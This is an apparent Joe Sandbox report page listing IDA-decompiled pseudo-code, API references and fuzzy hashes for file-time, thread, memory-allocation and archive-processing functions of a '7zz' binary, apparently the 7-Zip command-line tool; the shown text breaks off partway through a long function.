Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 33fa7bc332402748847c426bb7038baaea435e55007e32936245ae0630d27a3e
Instruction ID: 00a41a6e43d9e9d2736f99314ed8b7868d2ac66bf7d75e366eb682c8f7b18308
Opcode Fuzzy Hash: 33fa7bc332402748847c426bb7038baaea435e55007e32936245ae0630d27a3e
Instruction Fuzzy Hash: 84D0127110416146DE642E3D7C445C737D8AA423303210B6BF0B5D32E1D3748CD356D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD82 Relevance: 1.5, APIs: 1, Instructions: 9
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040BD82(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}

0x0040bd90
0x0040bd98
0x0040bd9c

APIs

SetFileTime.KERNELBASE(?,?,?,?), ref: 0040BD90

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 159763ee70248e45816b5ed0686b6e88efdf274a22e637b9fc2352e1e560d6e6
Instruction ID: 904542211cf95c1dba31585a344c430934b25bd4ea8d40f4864e79ca3744c005
Opcode Fuzzy Hash: 159763ee70248e45816b5ed0686b6e88efdf274a22e637b9fc2352e1e560d6e6
Instruction Fuzzy Hash: 62C04C36158105FF8F020F70DC04C1EBBA6AB95711F10CA18B259C4070C7338034EB02

Uniqueness

Uniqueness Score: -1.00%

Function 00467AD0 Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00467AD0(intOrPtr* __ecx, intOrPtr __edx, char _a4) {
				intOrPtr _t4;
				long _t5;
				intOrPtr* _t12;

				_t12 = __ecx;
				_t4 = E0046CD08(0, 0, __edx, _a4, 0,  &_a4); // executed
				 *_t12 = _t4;
				if(_t4 == 0) {
					_t5 = GetLastError();
					if(_t5 == 0) {
						return 1;
					}
					return _t5;
				} else {
					return 0;
				}
			}

0x00467ad8
0x00467ae4
0x00467aec
0x00467af1
0x00467af8
0x00467b00
0x00000000
0x00467b02
0x00467b07
0x00467af3
0x00467af5
0x00467af5

APIs

Part of subcall function 0046CD08: CreateThread.KERNELBASE ref: 0046CD49
Part of subcall function 0046CD08: GetLastError.KERNEL32(?,00467AE9,00000000,00000000,004148ED,?,00000000,?,?,00414677,?,?), ref: 0046CD53

GetLastError.KERNEL32(?,?,00414677,?,?), ref: 00467AF8

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ErrorLast$CreateThread
String ID:
API String ID: 665435222-0
Opcode ID: 75c33af1d3ad033ecb797aba507411330867c6b5fb6462af91c85880dadd199e
Instruction ID: f2b2db5cd6f09a71537b1524ed132628cfc4aafc29f8b6fc8c24ade46cb63582
Opcode Fuzzy Hash: 75c33af1d3ad033ecb797aba507411330867c6b5fb6462af91c85880dadd199e
Instruction Fuzzy Hash: 9CE086B22042015AE3109A549C05F6766989B90B45F04443EB944C6180F6A49950C76A

Uniqueness

Uniqueness Score: -1.00%

Function 004585C0 Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004585C0(long __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = VirtualAlloc(0, __ecx, 0x1000, 4); // executed
					return _t1;
				} else {
					return 0;
				}
			}

0x004585c2
0x004585d1
0x004585d7
0x004585c4
0x004585c6
0x004585c6

APIs

VirtualAlloc.KERNELBASE(00000000,0048DE00,00001000,00000004,00413C47,0048DE00,00000000,00414B97,00000500,0048DE00,00000000,00490AB0), ref: 004585D1

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 60f2cb083d3e1da89fbc138163c0eb26e01a85e12df0a1ae00077eedd1479cf7
Instruction ID: c1be663b654be8f4f03ee9fe28526b1f2e61089ce9361c0db0236efe8358a087
Opcode Fuzzy Hash: 60f2cb083d3e1da89fbc138163c0eb26e01a85e12df0a1ae00077eedd1479cf7
Instruction Fuzzy Hash: BFB012B039124475FE6843344C0BF6F2140A390B47F50406CB705E80C4FFE05840541D

Uniqueness

Uniqueness Score: -1.00%

Function 004585E0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004585E0(void* __ecx) {
				void* _t1;
				int _t2;

				if(__ecx != 0) {
					_t2 = VirtualFree(__ecx, 0, 0x8000); // executed
					return _t2;
				}
				return _t1;
			}

0x004585e2
0x004585ec
0x00000000
0x004585ec
0x004585f2

APIs

VirtualFree.KERNELBASE(0040F696,00000000,00008000,00413C3C,0048DE00,00000000,00414B97,00000500,0048DE00,00000000,00490AB0), ref: 004585EC

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 66ab59525338a2af16dc22d106436c8a083152c3c5af49293173989fc1d300f5
Instruction ID: 99068d3d514b32bd65c0f8a450bbacd2dc59915ab1aca7adb646860191089de3
Opcode Fuzzy Hash: 66ab59525338a2af16dc22d106436c8a083152c3c5af49293173989fc1d300f5
Instruction Fuzzy Hash: 9DB012F034130131FD3803110E05B1B10005740702E94802C7506B40C14D589804850C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00441925 Relevance: 20.4, APIs: 10, Strings: 1, Instructions: 1131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00441925(intOrPtr __ecx, signed int __edx) {
				void* __edi;
				intOrPtr _t641;
				intOrPtr* _t642;
				int _t650;
				char _t652;
				intOrPtr* _t654;
				intOrPtr _t669;
				signed int _t681;
				int _t700;
				intOrPtr* _t723;
				intOrPtr* _t729;
				int _t730;
				intOrPtr* _t731;
				intOrPtr* _t739;
				intOrPtr* _t744;
				intOrPtr* _t746;
				intOrPtr* _t754;
				intOrPtr* _t758;
				signed int _t766;
				intOrPtr* _t773;
				intOrPtr* _t775;
				intOrPtr* _t783;
				int _t788;
				intOrPtr _t790;
				struct _CRITICAL_SECTION* _t793;
				intOrPtr _t796;
				signed int _t797;
				void* _t805;
				int _t845;
				intOrPtr* _t852;
				int _t856;
				signed int _t857;
				int _t858;
				intOrPtr* _t865;
				intOrPtr* _t870;
				intOrPtr _t872;
				intOrPtr* _t880;
				intOrPtr* _t898;
				signed int _t902;
				signed int _t903;
				void* _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				intOrPtr* _t911;
				int _t928;
				intOrPtr _t931;
				signed int _t934;
				intOrPtr _t963;
				void* _t985;
				signed int _t996;
				signed int _t1133;
				signed int _t1135;
				signed int _t1154;
				signed int _t1155;
				void* _t1158;
				signed int _t1159;
				intOrPtr* _t1160;
				intOrPtr _t1161;
				struct _CRITICAL_SECTION* _t1163;
				void* _t1164;
				int _t1165;
				signed int _t1170;
				intOrPtr* _t1172;
				int _t1173;
				intOrPtr _t1174;
				signed int _t1175;
				int _t1176;
				intOrPtr* _t1177;
				signed int _t1178;
				intOrPtr _t1179;
				intOrPtr _t1180;
				intOrPtr _t1182;
				intOrPtr _t1183;
				intOrPtr _t1184;
				void* _t1186;
				void* _t1188;
				void* _t1189;
				void* _t1198;
				void* _t1205;

				_t1146 = __edx;
				E0046B890(E00478DCE, _t1186);
				_t1189 = _t1188 - 0x3a0;
				 *((intOrPtr*)(_t1186 - 0x24)) = __ecx;
				_t931 =  *((intOrPtr*)(_t1186 + 0x10));
				_t928 = 0;
				_t1154 = 0;
				 *((intOrPtr*)(_t1186 - 0x60)) = __edx;
				 *(_t1186 - 0x18) = 0;
				 *(_t1186 - 0x14) = 0;
				 *((intOrPtr*)(_t1186 - 0x30)) = 0;
				 *(_t1186 - 0x2c) = 0;
				 *((intOrPtr*)(_t1186 - 0x48)) = 0;
				 *(_t1186 - 0x44) = 0;
				if( *((intOrPtr*)(_t931 + 8)) <= 0) {
					L6:
					_t641 =  *((intOrPtr*)(_t1186 + 0x18));
					_t1194 = _t641 - _t928;
					if(_t641 != _t928) {
						 *(_t1186 - 0x18) =  *(_t1186 - 0x18) +  *((intOrPtr*)(_t641 + 4));
						asm("adc [ebp-0x14], ebx");
					}
					_t642 =  *((intOrPtr*)(_t1186 + 0x1c));
					_t1155 = 1;
					 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + _t1155;
					asm("adc [ebp-0x14], ebx");
					 *((intOrPtr*)( *_t642 + 0xc))(_t642,  *(_t1186 - 0x18),  *(_t1186 - 0x14));
					_t1170 =  *(_t1186 + 0x14);
					E00439D90(_t1186 - 0x3ac, _t1194, _t1170);
					_t934 =  *(_t1170 + 0x40);
					 *(_t1186 - 4) = _t1155;
					 *(_t1186 - 0x18) = _t928;
					 *(_t1186 - 0x14) = _t928;
					 *(_t1186 - 0x20) = _t934;
					if(_t934 > 0x400) {
						 *(_t1186 - 0x20) = 0x400;
					}
					E0043DF8F(_t1186 - 0x2ec);
					 *(_t1186 - 4) = 2;
					if(_t1170 == _t928) {
						L12:
						 *(_t1186 - 0xd) = _t928;
						L13:
						_t1198 =  *(_t1186 - 0x2c) - _t928;
						if(_t1198 <= 0 && (_t1198 < 0 ||  *((intOrPtr*)(_t1186 - 0x30)) <= _t1155)) {
							 *(_t1186 - 0xd) = _t928;
						}
						if( *(_t1186 - 0xd) == _t928) {
							L37:
							_push( *((intOrPtr*)(_t1186 + 0x1c)));
							_push( *((intOrPtr*)(_t1186 + 0x18)));
							_push(_t1170);
							_push( *((intOrPtr*)(_t1186 + 0x10)));
							_push( *((intOrPtr*)(_t1186 + 0xc)));
							_push( *(_t1186 + 8));
							_t928 = E00443231( *((intOrPtr*)(_t1186 - 0x24)),  *((intOrPtr*)(_t1186 - 0x60)));
							goto L124;
						} else {
							_t652 =  *((intOrPtr*)( *((intOrPtr*)(_t1170 + 0xc))));
							 *((char*)(_t1186 - 0x39)) = _t652;
							if(_t652 != _t928) {
								L21:
								if(_t652 != 0xc) {
									L33:
									if( *((char*)(_t1186 - 0x39)) == 0xe) {
										_t902 =  *(_t1186 - 0x20);
										_t1133 = (0 |  *((intOrPtr*)(_t1170 + 0x20)) - _t928 > 0x00000000) + 1;
										_t903 = _t902 / _t1133;
										_t1146 = _t902 % _t1133;
										 *(_t1186 - 0x2ac) = _t1133;
										 *(_t1186 - 0x20) = _t903;
										if(_t903 <= _t1155) {
											 *(_t1186 - 0xd) = _t928;
										}
									}
									L36:
									if( *(_t1186 - 0xd) != _t928) {
										E00405B9F(_t1186 - 0x5c);
										 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
										_push(0x10);
										 *(_t1186 - 4) = 3;
										_t654 = E004079F2();
										__eflags = _t654 - _t928;
										if(_t654 == _t928) {
											_t1172 = 0;
											__eflags = 0;
										} else {
											 *(_t654 + 4) = _t928;
											 *(_t654 + 0xc) = _t928;
											 *_t654 = 0x47b89c;
											_t1172 = _t654;
										}
										__eflags = _t1172 - _t928;
										 *((intOrPtr*)(_t1186 - 0x64)) = _t1172;
										 *((intOrPtr*)(_t1186 - 0x28)) = _t1172;
										if(_t1172 != _t928) {
											 *((intOrPtr*)( *_t1172 + 4))(_t1172);
										}
										_push(1);
										_push( *((intOrPtr*)(_t1186 + 0x1c)));
										 *(_t1186 - 4) = 4;
										E00441191(_t1172);
										E00443921(_t1186 - 0x13c);
										_push( *((intOrPtr*)(_t1172 + 0xc)));
										 *(_t1186 - 4) = 5;
										_push( *(_t1186 - 0x20));
										E0040F265(_t1186 - 0x13c);
										E0044295A(_t1186 - 0xe4, 0x10000);
										E00467C60(_t1186 - 0xd8);
										 *(_t1186 - 0xc0) = _t928;
										 *(_t1186 - 4) = 6;
										 *((intOrPtr*)(_t1186 - 0xbc)) = _t1186 - 0xe4;
										E00443B5C(_t1186 - 0xb8);
										 *(_t1186 - 4) = 7;
										E00443A5E(_t1186 - 0x90);
										 *(_t1186 - 4) = 8;
										E00404AD0(_t1186 - 0xa4, 4);
										 *((intOrPtr*)(_t1186 - 0xa4)) = 0x47a7f0;
										 *(_t1186 - 4) = 9;
										E00404AD0(_t1186 - 0x7c, 4);
										 *((intOrPtr*)(_t1186 - 0x7c)) = 0x47a668;
										 *(_t1186 - 4) = 0xa;
										_t1173 = E0040E850(_t1186 - 0xe4,  *(_t1186 - 0x20) << 9, _t928);
										__eflags = _t1173 - _t928;
										if(_t1173 == _t928) {
											_t1174 =  *((intOrPtr*)(_t1186 + 0x10));
											_t1158 = 0;
											__eflags =  *((intOrPtr*)(_t1174 + 8)) - _t928;
											if( *((intOrPtr*)(_t1174 + 8)) <= _t928) {
												L50:
												_t1175 =  *(_t1186 - 0x20);
												__eflags = _t1175 - _t928;
												if(_t1175 <= _t928) {
													L52:
													_t1159 = 0;
													__eflags =  *(_t1186 - 0x20) - _t928;
													if( *(_t1186 - 0x20) <= _t928) {
														L63:
														 *(_t1186 - 0x2c) =  *(_t1186 - 0x2c) | 0xffffffff;
														 *(_t1186 - 0x40) = _t928;
														 *(_t1186 - 0x38) = _t928;
														_t669 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 8));
														__eflags = _t669 - _t928;
														if(_t669 <= _t928) {
															L123:
															E00440D28( *((intOrPtr*)(_t1186 - 0x24)), _t1146, _t1186 - 0x5c,  *((intOrPtr*)(_t1186 + 0x18)));
															 *(_t1186 - 4) = 9;
															E00408604(_t1186 - 0x7c);
															 *(_t1186 - 4) = 8;
															E00408604(_t1186 - 0xa4);
															 *(_t1186 - 4) = 7;
															E00442DE5(_t1186 - 0x90);
															 *(_t1186 - 4) = 6;
															E00442E79(_t1186 - 0xbc);
															 *(_t1186 - 4) = 5;
															E0044296D(_t1186 - 0xe4);
															 *(_t1186 - 4) = 4;
															E0044395A(_t1186 - 0x13c, __eflags);
															 *(_t1186 - 4) = 3;
															E0043361B(_t1186 - 0x28);
															 *(_t1186 - 4) = 2;
															E00443C57(_t1186 - 0x5c);
															goto L124;
														} else {
															goto L64;
														}
														do {
															L64:
															__eflags =  *((intOrPtr*)(_t1186 - 0x74)) -  *(_t1186 - 0x20);
															if( *((intOrPtr*)(_t1186 - 0x74)) >=  *(_t1186 - 0x20)) {
																L95:
																_t681 =  *(_t1186 - 0x38) << 2;
																 *(_t1186 - 0x1c) = _t681;
																_t963 =  *((intOrPtr*)(_t681 +  *((intOrPtr*)(_t1186 - 0xac))));
																__eflags =  *((intOrPtr*)(_t963 + 0x41)) - _t928;
																if( *((intOrPtr*)(_t963 + 0x41)) == _t928) {
																	_t1160 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 0xc)) + _t681));
																	E0044375C(_t1186 - 0x294);
																	__eflags =  *((intOrPtr*)(_t1160 + 1)) - _t928;
																	 *(_t1186 - 4) = 0x18;
																	if( *((intOrPtr*)(_t1160 + 1)) == _t928) {
																		L99:
																		E00443768(_t1186 - 0x294,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0xc)) + 0xc)) +  *(_t1160 + 8) * 4)));
																		_push(_t1186 - 0x294);
																		__eflags = E0043F571( *((intOrPtr*)(_t1186 - 0x60)), _t1146);
																		if(__eflags != 0) {
																			_t1176 = 0x80004001;
																			L146:
																			 *(_t1186 - 4) = 0xa;
																			E0043CD47(_t1186 - 0x294, __eflags);
																			 *(_t1186 - 4) = 9;
																			E00408604(_t1186 - 0x7c);
																			 *(_t1186 - 4) = 8;
																			E00408604(_t1186 - 0xa4);
																			 *(_t1186 - 4) = 7;
																			E00442DE5(_t1186 - 0x90);
																			 *(_t1186 - 4) = 6;
																			E00442E79(_t1186 - 0xbc);
																			 *(_t1186 - 4) = 5;
																			E0044296D(_t1186 - 0xe4);
																			 *(_t1186 - 4) = 4;
																			E0044395A(_t1186 - 0x13c, __eflags);
																			 *(_t1186 - 4) = 3;
																			E0043361B(_t1186 - 0x28);
																			L147:
																			 *(_t1186 - 4) = 2;
																			E00443C57(_t1186 - 0x5c);
																			L148:
																			 *(_t1186 - 4) = 1;
																			E0043E0CB(_t1186 - 0x2ec);
																			 *(_t1186 - 4) =  *(_t1186 - 4) | 0xffffffff;
																			E00442D78(_t1186 - 0x3ac);
																			_t650 = _t1176;
																			goto L125;
																		}
																		__eflags =  *_t1160 - _t928;
																		if( *_t1160 == _t928) {
																			_t1146 =  *(_t1186 + 8);
																			_t700 = E00442EE9( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 8), _t1160, _t1186 - 0x294,  *((intOrPtr*)(_t1186 - 0x28)), _t1186 - 0x18);
																			__eflags = _t700 - _t928;
																			if(__eflags != 0) {
																				L145:
																				_t1176 = _t700;
																				goto L146;
																			}
																			L119:
																			_push(_t1186 - 0x294);
																			E00443C8F(_t1186 - 0x5c);
																			 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + 0x1a;
																			asm("adc [ebp-0x14], ebx");
																			E00441083( *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x64)) + 8)),  *(_t1186 - 0x18),  *(_t1186 - 0x14));
																			_t494 = _t1186 - 0x38;
																			 *_t494 =  *(_t1186 - 0x38) + 1;
																			__eflags =  *_t494;
																			L120:
																			 *(_t1186 - 4) = 0xa;
																			_t985 = _t1186 - 0x294;
																			L121:
																			E0043CD47(_t985, __eflags);
																			goto L122;
																		}
																		L101:
																		__eflags =  *((intOrPtr*)(_t1160 + 1)) - _t928;
																		if( *((intOrPtr*)(_t1160 + 1)) == _t928) {
																			_t790 = E00440593(_t1186 - 0x294);
																		} else {
																			_t790 =  *((intOrPtr*)(_t1160 + 2));
																		}
																		__eflags = _t790 - _t928;
																		if(_t790 == _t928) {
																			__eflags =  *(_t1186 - 0x2c) -  *(_t1186 - 0x38);
																			if( *(_t1186 - 0x2c) >=  *(_t1186 - 0x38)) {
																				_t1178 =  *(_t1186 + 0x14);
																			} else {
																				_t1178 =  *(_t1186 + 0x14);
																				 *(_t1186 - 0x2c) =  *(_t1186 - 0x38);
																				_t1146 = _t1178;
																				E00442B0A( *((intOrPtr*)(_t1186 - 0x24)), _t1178, _t1160, _t1186 - 0x294);
																				E0044072C( *((intOrPtr*)(_t1186 - 0x270)),  *((intOrPtr*)(_t1160 + 0x18)),  *((intOrPtr*)(_t1160 + 0x1c)),  *((intOrPtr*)(_t1178 + 0x54)));
																			}
																			_t793 =  *( *(_t1186 - 0x1c) +  *((intOrPtr*)(_t1186 - 0xac)));
																			 *(_t1186 - 0x68) = _t793;
																			__eflags =  *((intOrPtr*)(_t793 + 0x40)) - _t928;
																			if( *((intOrPtr*)(_t793 + 0x40)) == _t928) {
																				_t1179 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) +  *( *(_t1186 - 0x70)) * 4));
																				_t796 =  *((intOrPtr*)(_t1179 + 0x18));
																				__eflags =  *((intOrPtr*)(_t796 + 0x15)) - _t928;
																				if( *((intOrPtr*)(_t796 + 0x15)) == _t928) {
																					 *(_t1186 - 0x44) = _t928;
																					_push(_t1186 - 0x44);
																					 *(_t1186 - 4) = 0x1a;
																					E00440F0D( *((intOrPtr*)(_t1186 - 0x24)));
																					E00442A14( *((intOrPtr*)(_t1179 + 0x18)),  *(_t1186 - 0x44));
																					 *((char*)( *((intOrPtr*)(_t1179 + 0x18)) + 0x15)) = 1;
																					E00467B10( *((intOrPtr*)(_t1179 + 0x18)) + 0x1c);
																					 *(_t1186 - 4) = 0x18;
																					E0043361B(_t1186 - 0x44);
																				}
																				_t797 = WaitForMultipleObjects( *(_t1186 - 0x9c),  *(_t1186 - 0x98), _t928, 0xffffffff);
																				 *(_t1186 - 0x1c) = _t797;
																				_t1180 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) + ( *(_t1186 - 0x70))[_t797] * 4));
																				E00437D6C(_t1180 + 0x20);
																				_t700 =  *(_t1180 + 0x9c);
																				 *((char*)(_t1180 + 0xb8)) = 1;
																				__eflags = _t700 - _t928;
																				if(__eflags != 0) {
																					goto L145;
																				} else {
																					E00408784(_t1186 - 0x7c,  *(_t1186 - 0x1c), 1);
																					E00408784(_t1186 - 0xa4,  *(_t1186 - 0x1c), 1);
																					__eflags =  *(_t1186 - 0x1c) - _t928;
																					if(__eflags != 0) {
																						_t1165 =  *( *((intOrPtr*)(_t1186 - 0xac)) +  *(_t1180 + 0xbc) * 4);
																						 *(_t1186 - 0x1c) = _t1165;
																						E0040F015( *(_t1180 + 0x18), __eflags, _t1165);
																						_t996 = 6;
																						_t805 = memcpy(_t1165 + 0x28, _t1180 + 0xa0, _t996 << 2);
																						_t1189 = _t1189 + 0xc;
																						 *((char*)(_t805 + 0x40)) = 1;
																						goto L120;
																					}
																					_t700 = E0040F032( *(_t1180 + 0x18));
																					__eflags = _t700 - _t928;
																					if(__eflags != 0) {
																						goto L145;
																					}
																					 *(_t1186 - 0x1c) =  *(_t1180 + 0x18);
																					E00437D6C( *(_t1180 + 0x18) + 0x54);
																					E00437D6C( *(_t1186 - 0x1c) + 0x50);
																					_push(_t1186 - 0x294);
																					_push( *((intOrPtr*)( *(_t1186 + 0x14) + 0x55)));
																					E00442BEC(_t1180 + 0xa0,  *((intOrPtr*)( *(_t1186 + 0x14) + 0x54)));
																					_t1146 =  *(_t1186 + 0x14);
																					E00442B0A( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14), _t1160, _t1186 - 0x294);
																					_push(_t1186 - 0x294);
																					E004408BF( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14));
																					goto L119;
																				}
																			} else {
																				 *(_t1186 - 0x1c) = _t928;
																				_push(_t1186 - 0x1c);
																				 *(_t1186 - 4) = 0x19;
																				E00440F0D( *((intOrPtr*)(_t1186 - 0x24)));
																				E0040E94A( *(_t1186 - 0x68),  *((intOrPtr*)(_t1186 - 0xe0)),  *(_t1186 - 0x1c));
																				_push(_t1186 - 0x294);
																				_push( *((intOrPtr*)(_t1178 + 0x55)));
																				E00442BEC( *(_t1186 - 0x68) + 0x28,  *((intOrPtr*)(_t1178 + 0x54)));
																				_t1146 = _t1178;
																				E00442B0A( *((intOrPtr*)(_t1186 - 0x24)), _t1178, _t1160, _t1186 - 0x294);
																				_push(_t1186 - 0x294);
																				E004408BF( *((intOrPtr*)(_t1186 - 0x24)), _t1178);
																				E0040E933( *(_t1186 - 0x68), _t1160, _t1186 - 0xe4);
																				 *(_t1186 - 4) = 0x18;
																				E0043361B(_t1186 - 0x1c);
																				goto L119;
																			}
																		} else {
																			_t1146 =  *(_t1186 + 0x14);
																			E004431F3( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14), _t1160, _t1186 - 0x294);
																			goto L119;
																		}
																	}
																	__eflags =  *_t1160 - _t928;
																	if( *_t1160 != _t928) {
																		goto L101;
																	}
																	goto L99;
																}
																 *(_t1186 - 0x38) =  *(_t1186 - 0x38) + 1;
																goto L122;
															}
															__eflags =  *(_t1186 - 0x40) - _t669;
															if( *(_t1186 - 0x40) >= _t669) {
																goto L95;
															}
															 *(_t1186 - 0x40) =  *(_t1186 - 0x40) + 1;
															_t1177 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 0xc)) + ( *(_t1186 - 0x40) << 2)));
															__eflags =  *_t1177 - _t928;
															if(__eflags == 0) {
																goto L122;
															}
															E0043F39F(_t1186 - 0x1d4, __eflags);
															__eflags =  *((intOrPtr*)(_t1177 + 1)) - _t928;
															 *(_t1186 - 4) = 0x12;
															if( *((intOrPtr*)(_t1177 + 1)) == _t928) {
																_t1161 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0xc)) + 0xc)) +  *(_t1177 + 8) * 4));
																E00443797(_t1186 - 0x1d4, _t1161);
																 *((intOrPtr*)(_t1186 - 0x144)) =  *((intOrPtr*)(_t1161 + 0x90));
																 *(_t1186 - 0x140) =  *((intOrPtr*)(_t1161 + 0x94));
																_push(_t1186 - 0x1d4);
																__eflags = E0043F571( *((intOrPtr*)(_t1186 - 0x60)), _t1146);
																if(__eflags != 0) {
																	 *(_t1186 - 4) = 0xa;
																	E0043CD47(_t1186 - 0x1d4, __eflags);
																	 *(_t1186 - 4) = 9;
																	E00408604(_t1186 - 0x7c);
																	 *(_t1186 - 4) = 8;
																	E00408604(_t1186 - 0xa4);
																	 *(_t1186 - 4) = 7;
																	E00442DE5(_t1186 - 0x90);
																	 *(_t1186 - 4) = 6;
																	E00442E79(_t1186 - 0xbc);
																	 *(_t1186 - 4) = 5;
																	E0044296D(_t1186 - 0xe4);
																	 *(_t1186 - 4) = 4;
																	E0044395A(_t1186 - 0x13c, __eflags);
																	_t723 =  *((intOrPtr*)(_t1186 - 0x28));
																	 *(_t1186 - 4) = 3;
																	__eflags = _t723 - _t928;
																	if(_t723 != _t928) {
																		 *((intOrPtr*)( *_t723 + 8))(_t723);
																	}
																	 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																	 *(_t1186 - 4) = 0x13;
																	E0040862D();
																	 *(_t1186 - 4) = 2;
																	E00408604(_t1186 - 0x5c);
																	_t1176 = 0x80004001;
																	goto L148;
																}
